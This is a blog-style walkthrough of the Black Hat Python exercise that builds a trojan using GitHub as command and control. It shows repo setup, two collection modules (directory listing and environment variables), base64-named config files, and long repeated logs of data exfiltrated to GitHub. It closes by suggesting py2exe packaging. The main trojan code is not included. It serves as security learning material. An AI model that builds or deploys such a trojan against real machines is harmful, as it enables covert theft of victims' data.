Black Hat Python — Trojans and Github

Ismail Akkila
4 min readNov 5, 2017

I loved going through this exercise. We will create a simple python trojan which uses github for command and control. With GitHub, we can create our own python code modules that our trojan can import and execute..yes!! Python can import its modules using GitHub! Our trojan will seek out its configuration file to know what modules should be loaded. These modules will be executed and the exfiltrated data is uploaded to our GitHub repository. Pretty damn cool!

Github basics:mkdir project_folder
cd project_folder
mkdir modules
mkdir config
mkdir data
touch modules/.gitignore
touch config/.gitignore
touch data/.gitignore
git init
git add .
git commit -m "Creating Repo Structure"
git remote add origin <github_url_repository>
git push origin master

The config directory holds configuration files that will be uniquely identified for each trojan.

The modules directory contains any modular code that you want the trojan to pick up and execute.

The data directory is where the trojan will check in any collected data, keystrokes, screenshots, and so forth.

You can check out my repo here for reference. As an example, there are 2 simple modules:

dirlister: To list directories

import os
def run(**args):
command_output = "[*] In dirlister module:\n\n"
return command_output + str(os.listdir(".")) + "\n\n"

environ: To retrieve any environment variables on the remote machine

import os
def run(**args):
command_output = "[*] In environ module:\n\n"
return command_output + str(os.environ) + "\n\n"

They are extensible and you can pass multiple arguments if you wish.

Looking at the config folder, we have a default configuration file, in case our specific trojan config file is not located: ZGVmYXVsdA==.json and a trojan specific one : SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json

They names are encoded in Base64 so you can use https://www.base64decode.org to decode. The config file is a json formatted this way:

[
{ "module": "dirlister" },
{ "module": "environ" }
]

Essentially, a list of code modules for our trojan to load. This can be modified as you introduce more code modules on a per trojan basis identified using a unique trojan config file like mine: SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json which decodes to: ISAKKILA-M-C0KP-0x8c8590496e0c.json

Here is the trojan code. You need to put in your github account credentials which is not ideal but this just a learning exercise:

Executing this trojan has created the following file in my reposistory’s data folder:

However, the file contents is Base64 encoded (for obscurity…would be better to introduce encryption instead):

****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:23:34.401488
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:24:14.884963
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:24:39.382059
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:25:09.381967
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:25:38.994855
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:26:08.450243
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:26:33.695301
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:

['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt']


[*] In environ module:

environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})


[*] Finished Executing Modules


Decoding this would reveal the exfiltrated data!!

****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:23:34.401488
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:
['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt'][*] In environ module:environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
****************************************************************************************************
[*] Running On: ISAKKILA-M-C0KP-0x8c8590496e0c
[*] Time: 2017-11-02T16:24:14.884963
[*] Using Specific Modules
[*] Successful Modules Import From: config/SVNBS0tJTEEtTS1DMEtQLTB4OGM4NTkwNDk2ZTBj.json
[*] In dirlister module:
['.DS_Store', '000webhost.txt', 'all.txt', 'blackhatpython-ch7', 'cb-live.json', 'ch2_bhpnet.py', 'ch2_netcat_example.py', 'ch2_rforward.py', 'ch2_rforward_server.py', 'ch2_simple_tcp_server.py', 'ch2_ssh_client.py', 'ch2_ssh_server.key', 'ch2_ssh_server.py', 'ch2_tcpproxy_example.py', 'ch2_tcpservertools_example.py', 'ch4_arp_poison.py', 'ch5_html_form_brute_force.py', 'ch5_http_brute_forcer.py', 'ch6_burp_send_to_bing.py', 'ch6_burp_wordlist.py', 'external_edge-live.json', 'host.key', 'internal_edge-live.json', 'jython-standalone-2.7.0.jar', 'output.txt', 'passwd.txt', 'scapy_parser.py', 'some_file', 'test', 'test.pcap', 'test.py', 'test1.py', 'test_folder', 'text_pcap.pcap', 'urls.txt', 'urls_from_pcap.txt', 'urls_sniff.txt'][*] In environ module:environ({'TERM_PROGRAM': 'Apple_Terminal', 'SHELL': '/bin/bash', 'TERM': 'xterm-256color', 'TMPDIR': '/var/folders/xl/7bn03w590cs7r70735ng7x6w0000gn/T/', 'Apple_PubSub_Socket_Render': '/private/tmp/com.apple.launchd.1EY8hXmQfG/Render', 'TERM_PROGRAM_VERSION': '388.1.1', 'OLDPWD': '/Users/isakkila/Documents/blackhatpython/blackhatpython-ch7', 'TERM_SESSION_ID': '6725EFCC-10FB-4E58-8C8B-F023F7DDCFE5', 'USER': 'isakkila', 'SSH_AUTH_SOCK': '/private/tmp/com.apple.launchd.5f3TvFJM1V/Listeners', '__CF_USER_TEXT_ENCODING': '0x1F5:0x0:0x0', 'PATH': '/Library/Frameworks/Python.framework/Versions/3.6/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/opt/X11/bin:/usr/local/bin/jamf:/Applications/Wireshark.app/Contents/MacOS', 'PWD': '/Users/isakkila/Documents/blackhatpython', 'XPC_FLAGS': '0x0', 'XPC_SERVICE_NAME': '0', 'SHLVL': '1', 'HOME': '/Users/isakkila', 'LOGNAME': 'isakkila', 'LC_CTYPE': 'UTF-8', 'DISPLAY': '/private/tmp/com.apple.launchd.LDvTIFlJfP/org.macosforge.xquartz:0', '_': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3', '__PYVENV_LAUNCHER__': '/Library/Frameworks/Python.framework/Versions/3.6/bin/python3'})[*] Finished Executing Modules
[*] Sleeping For 10 Seconds
-----Truncated------

You can compile the python script into an executable using py2exe. I will leave your imagination to do the work!

--

--

Ismail Akkila

I live and breathe technology. Curious about programming, bitcoin and cybersecurity.